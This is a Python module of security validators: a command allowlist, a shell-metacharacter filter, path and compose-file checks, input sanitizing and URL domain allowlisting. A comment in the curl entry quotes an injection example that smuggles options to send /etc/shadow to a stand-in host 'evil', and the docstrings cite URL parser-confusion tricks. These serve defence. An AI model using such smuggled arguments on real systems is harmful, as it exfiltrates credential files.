403 lines
12 KiB
Python
403 lines
12 KiB
Python
"""Security validation utilities for safe command and file operations."""
|
|
|
|
import re
|
|
from pathlib import Path
|
|
from typing import Optional
|
|
|
|
# Shell metacharacters that must never appear in a command or its arguments.
# This is a defense-in-depth filter against command substitution, variable
# expansion, chaining/piping and redirection. It is NOT an exhaustive list of
# shell-special characters: quotes, globs, backslashes, braces and whitespace
# (including newlines) are not covered. So passing this check does not make a
# string safe to hand to a shell.
FORBIDDEN_SHELL_PATTERNS = re.compile(r'[`$();|&<>]')

# ENV key validation pattern: uppercase letters, digits and underscores; must
# start with a letter. `\Z` anchors the true end of the string. A `$` anchor
# also matches just before a trailing newline, which let "FOO\n" pass.
ENV_KEY_PATTERN = re.compile(r'^[A-Z][A-Z0-9_]*\Z')
|
|
|
|
# Allowed commands with their argument validation patterns and timeouts.
# Keys are ABSOLUTE paths to prevent PATH hijacking.
#
# Each entry holds:
#   args_pattern -- regex the entire argument string must match
#   timeout      -- timeout value for the command (presumably seconds; confirm
#                   against the executor)
#   description  -- human-readable summary
#
# NOTE(review): the docker "compose" subcommand accepts any trailing words, so
# it also admits e.g. "compose exec ...", "compose run ..." and "-f <file>".
# Callers needing tighter control must validate further (the compose file
# itself can be checked with validate_compose_path).
ALLOWED_COMMANDS: dict[str, dict] = {
    # File system inspection
    "/usr/bin/ls": {
        "args_pattern": r"^[-alhrRtS\s/\w.]*$",
        "timeout": 30,
        "description": "List directory contents",
    },
    "/usr/bin/cat": {
        "args_pattern": r"^[\w./\-]+$",
        "timeout": 30,
        "description": "Display file contents",
    },
    "/usr/bin/df": {
        "args_pattern": r"^[-hT\s/\w]*$",
        "timeout": 30,
        "description": "Disk space usage",
    },
    "/usr/bin/free": {
        "args_pattern": r"^[-hmg\s]*$",
        "timeout": 30,
        "description": "Memory usage",
    },
    "/usr/bin/du": {
        "args_pattern": r"^[-shc\s/\w.]*$",
        "timeout": 60,
        "description": "Directory size",
    },
    # Docker operations
    "/usr/bin/docker": {
        "args_pattern": r"^(compose|ps|logs|images|inspect|stats)[\s\w.\-/:]*$",
        "timeout": 300,
        "description": "Docker operations (limited subcommands)",
    },
    # Service management
    "/usr/bin/systemctl": {
        "args_pattern": r"^(status|restart|start|stop|enable|disable|is-active)\s+[\w\-@.]+$",
        "timeout": 60,
        "description": "Systemd service management",
    },
    # Network diagnostics
    "/usr/bin/curl": {
        # The -w format must be a single whitespace-free "%{...}" word.
        # Argument strings are split on whitespace before execution, so
        # allowing spaces inside the braces let a caller smuggle extra curl
        # options (e.g. "%{x -d @/etc/shadow --url http://evil/ y}").
        "args_pattern": r"^(-s\s+)?-o\s+/dev/null\s+-w\s+['\"]?%\{[^}\s]+\}['\"]?\s+https?://[\w.\-/:]+$",
        "timeout": 30,
        "description": "HTTP health checks only",
    },
}
|
|
|
|
|
|
class ValidationError(Exception):
    """Signal that an input failed one of this module's security checks."""
|
|
|
|
|
|
def validate_shell_command(cmd: str, args: str = "") -> tuple[str, list[str], int]:
    """Validate a shell command against security policies.

    The command must be an absolute path listed in ``ALLOWED_COMMANDS``. The
    stripped argument string must match that command's ``args_pattern`` in
    full. Arguments are then split on whitespace only, with no quoting,
    globbing or other shell interpretation.

    Args:
        cmd: The command to execute (must be an absolute path).
        args: Command arguments as a single string. Empty or whitespace-only
            arguments are still checked against the pattern, so a command whose
            pattern requires arguments cannot be invoked bare.

    Returns:
        Tuple of (absolute_cmd_path, args_list, timeout).

    Raises:
        ValidationError: If the command or arguments fail validation.
    """
    # Normalize command path
    cmd = cmd.strip()

    # Check for forbidden patterns in command
    if FORBIDDEN_SHELL_PATTERNS.search(cmd):
        raise ValidationError(f"Command contains forbidden characters: {cmd}")

    # Check for forbidden patterns in arguments
    if args and FORBIDDEN_SHELL_PATTERNS.search(args):
        raise ValidationError(f"Arguments contain forbidden characters: {args}")

    # Verify command is in allowlist
    schema = ALLOWED_COMMANDS.get(cmd)
    if schema is None:
        # Give a helpful hint when the caller passed a bare/relative name
        # of an allowed command instead of its absolute path.
        for allowed_cmd in ALLOWED_COMMANDS:
            if allowed_cmd.endswith(f"/{cmd}"):
                raise ValidationError(
                    f"Command '{cmd}' must use absolute path: {allowed_cmd}"
                )
        raise ValidationError(f"Command not in allowlist: {cmd}")

    # Always validate, even when no arguments were given. Previously empty
    # args skipped this check, letting e.g. bare `cat`/`docker`/`systemctl`
    # through although their patterns require arguments. Treat None as "".
    args = (args or "").strip()
    # fullmatch: the whole string must satisfy the pattern; this also stops a
    # `$` anchor from accepting a trailing newline.
    if not re.fullmatch(schema["args_pattern"], args):
        raise ValidationError(
            f"Arguments do not match allowed pattern for {cmd}: {args}"
        )

    # Parse arguments into list (whitespace split, no shell interpretation)
    return cmd, args.split(), schema["timeout"]
|
|
|
|
|
|
def validate_file_path(
    path: str,
    allowed_root: str,
    must_exist: bool = False,
    max_size: Optional[int] = None,
) -> Path:
    """Validate a file path against security policies.

    The path is user-expanded and resolved with ``Path.resolve()``, which
    follows symlinks. Relative paths therefore resolve against the current
    working directory, not against ``allowed_root``. The resolved path must
    lie inside the resolved ``allowed_root``.

    Args:
        path: The file path to validate.
        allowed_root: The root directory that path must be within.
        must_exist: If True, verify the path exists.
        max_size: If provided, verify file size is under limit (only checked
            for existing regular files).

    Returns:
        Resolved Path object.

    Raises:
        ValidationError: If the path fails validation.
    """
    # Reject paths with obvious traversal attempts
    if ".." in path:
        raise ValidationError(f"Path contains directory traversal: {path}")

    # NUL bytes are never valid in filesystem paths. Depending on the Python
    # version, resolve() either raises a raw ValueError or passes them through.
    if "\x00" in path:
        raise ValidationError("Path contains NUL byte")

    # Convert to Path objects
    try:
        file_path = Path(path).expanduser()
        root_path = Path(allowed_root).expanduser().resolve()
    except (ValueError, RuntimeError, OSError) as e:
        raise ValidationError(f"Invalid path format: {e}") from e

    # Resolve to canonical path (follows symlinks, resolves ..)
    try:
        resolved_path = file_path.resolve()
    except (ValueError, OSError, RuntimeError) as e:
        raise ValidationError(f"Cannot resolve path: {e}") from e

    # Verify path is within allowed root
    try:
        resolved_path.relative_to(root_path)
    except ValueError:
        raise ValidationError(
            f"Path {resolved_path} is outside allowed root {root_path}"
        ) from None

    # Check existence if required
    if must_exist and not resolved_path.exists():
        raise ValidationError(f"File does not exist: {resolved_path}")

    # Check file size if applicable
    if max_size is not None and resolved_path.is_file():
        try:
            file_size = resolved_path.stat().st_size
        except OSError as e:
            # e.g. the file vanished or became unreadable after is_file()
            raise ValidationError(f"Cannot stat file: {e}") from e
        if file_size > max_size:
            raise ValidationError(
                f"File size {file_size} exceeds limit {max_size}: {resolved_path}"
            )

    return resolved_path
|
|
|
|
|
|
def sanitize_input(text: str, max_length: int = 10000) -> str:
    """Strip control characters from user-supplied text.

    Newlines and tabs are kept. Every other character below U+0020 (including
    NUL and carriage return) and DEL (U+007F) are dropped. Printable and
    non-ASCII characters pass through unchanged.

    Args:
        text: Input text to sanitize.
        max_length: Maximum allowed length, checked before any stripping.

    Returns:
        The text with disallowed control characters removed.

    Raises:
        ValidationError: If input exceeds max length.
    """
    if len(text) > max_length:
        raise ValidationError(f"Input exceeds maximum length of {max_length}")

    def _is_allowed(ch: str) -> bool:
        # Whitelisted whitespace controls survive; other C0 controls and DEL do not.
        if ch == "\n" or ch == "\t":
            return True
        code_point = ord(ch)
        return code_point >= 32 and code_point != 127

    return "".join(filter(_is_allowed, text))
|
|
|
|
|
|
def validate_compose_path(path: str, allowed_paths: list[str]) -> Path:
    """Validate a docker-compose file path.

    The path is user-expanded and resolved (following symlinks). It must lie
    inside one of ``allowed_paths``, exist as a regular file, and have a
    ``.yml`` or ``.yaml`` name.

    Args:
        path: Path to compose file.
        allowed_paths: List of allowed parent directories. Entries that cannot
            be resolved are skipped.

    Returns:
        Resolved Path object.

    Raises:
        ValidationError: If the path is malformed, not in an allowed directory,
            missing, not a regular file, or not a YAML file.
    """
    if ".." in path:
        raise ValidationError(f"Path contains directory traversal: {path}")

    try:
        resolved = Path(path).expanduser().resolve()
    except (ValueError, RuntimeError, OSError) as e:
        raise ValidationError(f"Invalid compose path: {e}") from e

    # Check if path is within any allowed directory
    for allowed in allowed_paths:
        try:
            allowed_path = Path(allowed).expanduser().resolve()
        except (ValueError, RuntimeError, OSError):
            # An unusable allowlist entry grants nothing; try the next one.
            continue

        if not resolved.is_relative_to(allowed_path):
            continue

        if not resolved.exists():
            raise ValidationError(f"Compose file does not exist: {resolved}")
        # exists() alone also accepts directories (e.g. a dir named "x.yml").
        if not resolved.is_file():
            raise ValidationError(f"Compose path is not a regular file: {resolved}")
        if not resolved.name.endswith((".yml", ".yaml")):
            raise ValidationError(f"Not a YAML file: {resolved}")
        return resolved

    raise ValidationError(
        f"Compose path {resolved} is not in allowed directories: {allowed_paths}"
    )
|
|
|
|
|
|
def validate_env_key(key: str) -> bool:
    """Validate an environment variable key format.

    Keys must:
        - Start with an uppercase letter (A-Z)
        - Contain only uppercase letters, numbers, and underscores

    Args:
        key: The environment variable key to validate.

    Returns:
        True if valid.

    Raises:
        ValidationError: If the key is empty or its format is invalid.
    """
    if not key:
        raise ValidationError("ENV key cannot be empty")

    # fullmatch rather than match: with match(), a `$` end anchor also accepts
    # a single trailing newline, so "FOO\n" would have been reported valid.
    if not ENV_KEY_PATTERN.fullmatch(key):
        raise ValidationError(
            f"Invalid ENV key format '{key}': must match ^[A-Z][A-Z0-9_]*$"
        )

    return True
|
|
|
|
|
|
def _split_host_port(pattern: str) -> tuple[str, Optional[str]]:
    """Split an allowlist pattern into (host, port); port is None when absent.

    Bracketed IPv6 literals such as "[::1]:8080" are returned without the
    brackets, so they compare equal to ``urlparse(...).hostname``.
    """
    if pattern.startswith("["):
        host, _, rest = pattern[1:].partition("]")
        port = rest[1:] if rest.startswith(":") else ""
    elif ":" in pattern:
        host, _, port = pattern.rpartition(":")
    else:
        host, port = pattern, ""
    return host, port or None


def is_domain_allowed(url: str, allowed_domains: list[str]) -> bool:
    """Check if a URL's domain is in the allowed list.

    Supports:
        - Exact domain match: "cloud.example.com"
        - Wildcard subdomain: "*.example.com" (matches any subdomain and the
          bare domain itself)
        - Port specification: "cloud.example.com:8443" (the URL must carry
          that explicit port)

    The host and port come from ``urlparse(...).hostname`` / ``.port``, so
    userinfo is never mistaken for the host. For example,
    "https://cloud.example.com:443@evil.com" is judged by its real host,
    evil.com. URLs containing backslashes, interior whitespace or control
    characters are rejected, because URL parsers disagree on how to interpret
    them.

    Args:
        url: The URL to check.
        allowed_domains: List of allowed domain patterns.

    Returns:
        True if the domain is allowed, False otherwise (including for any
        malformed input: the check fails closed).

    Examples:
        >>> is_domain_allowed("https://cloud.example.com/path", ["cloud.example.com"])
        True
        >>> is_domain_allowed("https://sub.example.com", ["*.example.com"])
        True
        >>> is_domain_allowed("https://evil.com", ["example.com"])
        False
    """
    from urllib.parse import urlparse

    if not url or not allowed_domains:
        return False

    try:
        url = url.strip()
        # Parser-differential guard: e.g. "https://evil.com\@x.example.com" is
        # host x.example.com to urlparse but evil.com to WHATWG-style parsers.
        if "\\" in url or any(ord(ch) <= 32 or ord(ch) == 127 for ch in url):
            return False

        parsed = urlparse(url)
        if not parsed.scheme and not parsed.netloc:
            # Scheme-less input like "example.com/path": parse it as a
            # network-path reference so the first segment becomes the host.
            parsed = urlparse("//" + url)

        url_domain = parsed.hostname  # lower-cased; userinfo/brackets removed
        url_port = parsed.port  # raises ValueError for a malformed port
        if not url_domain:
            return False
        url_port_str = None if url_port is None else str(url_port)

        for raw_pattern in allowed_domains:
            pattern_domain, pattern_port = _split_host_port(raw_pattern.lower().strip())

            # If pattern specifies a port, URL must carry that explicit port
            if pattern_port is not None and url_port_str != pattern_port:
                continue

            if pattern_domain.startswith("*."):
                # Wildcard: match the bare suffix or any subdomain of it
                suffix = pattern_domain[2:]
                if url_domain == suffix or url_domain.endswith("." + suffix):
                    return True
            elif url_domain == pattern_domain:
                return True

        return False

    except (ValueError, TypeError, AttributeError):
        # Fail closed on malformed URLs/patterns (bad port, bad IPv6 literal,
        # non-string entries).
        return False
|
|
|
|
|
|
def validate_allowed_domains(domains: list[str]) -> list[str]:
    """Validate and normalize a list of allowed domains.

    Each entry is stripped and lower-cased. Entries carrying a URL scheme are
    rejected. A wildcard is only allowed as a single leading "*." followed by
    a domain that itself contains a dot (so "*.com" is refused).

    Args:
        domains: List of domain patterns to validate.

    Returns:
        List of normalized domain patterns, in input order.

    Raises:
        ValidationError: If the list is empty or any domain pattern is invalid.
    """
    if not domains:
        raise ValidationError("allowed_domains cannot be empty")

    normalized = []
    for domain in domains:
        domain = domain.strip().lower()

        if not domain:
            raise ValidationError("Empty domain in allowed_domains list")

        # Reject any URL scheme (ftp://, ws://, ...), not only http(s): such
        # an entry can never match a bare hostname.
        if "://" in domain:
            raise ValidationError(
                f"Domain should not include protocol: {domain}. "
                "Use 'example.com' not 'https://example.com'"
            )

        # Wildcard validation: exactly one wildcard, and only as a "*." prefix
        if "*" in domain:
            if not domain.startswith("*.") or "*" in domain[2:]:
                raise ValidationError(
                    f"Invalid wildcard pattern: {domain}. "
                    "Wildcards must be at the start: '*.example.com'"
                )
            # Ensure there's a real multi-label domain after the wildcard
            suffix = domain[2:]
            if "." not in suffix or suffix.startswith("."):
                raise ValidationError(
                    f"Invalid wildcard pattern: {domain}. "
                    "Must have a valid domain after '*.' like '*.example.com'"
                )

        normalized.append(domain)

    return normalized
|